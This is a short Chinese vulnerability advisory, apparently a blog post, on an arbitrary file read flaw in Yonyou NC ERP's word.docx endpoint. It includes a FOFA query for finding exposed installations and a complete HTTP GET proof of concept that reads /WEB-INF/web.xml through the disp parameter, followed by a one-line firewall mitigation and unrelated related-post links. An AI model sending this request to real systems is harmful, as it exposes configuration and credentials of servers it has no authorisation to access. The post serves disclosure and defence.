用友NC word.docx任意文件读取漏洞

文章目录

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理

漏洞概述

用友NC在word.docx的disp参数存在任意文件读取漏洞

指纹识别

fofa:

python 复制代码
app="用友-UFIDA-NC"

漏洞利用

Poc:

python 复制代码
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

修复建议

临时缓解措施:在应用防火墙上配置 禁止访问word.docx接口策略

【其实吵架从来没有输赢的,或者说都是输。】

相关推荐
Brucye6 分钟前
[极客大挑战 2019]BabySQL 1
sql·网络安全
一名优秀的码农31 分钟前
vulhub系列-34-djinn-3(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
冷小鱼42 分钟前
国家网络安全事件报告管理办法
安全·web安全·网络安全·信息安全·安全法
乾元1 小时前
RAG 架构: 利用向量数据库构建企业的安全知识库
运维·网络·数据库·人工智能·安全·网络安全·架构
文刀竹肃2 小时前
SQLi-Labs Less-2 通关教程(数字型GET注入)
web安全·网络安全
数通工程师2 小时前
搞定数通设备账号安全:登录审计、紧急踢线、故障排查与配置规范
运维·网络·网络协议·安全·网络安全
李江林3 小时前
IPSec协议技术分析文档
网络协议·网络安全·vpn·ipsec
姬成韶5 小时前
BUUCTF---[第一章 web入门]常见的搜集
网络安全·信息分析
檐下翻书1735 小时前
企业组织架构图导出Word 在线编辑免费工具
人工智能·信息可视化·去中心化·word·流程图·ai编程
小张的博客之旅6 小时前
2026第十届“楚慧杯”湖北省网络与数据安全实践能力竞赛 (全Writeup)
python·网络安全·openclaw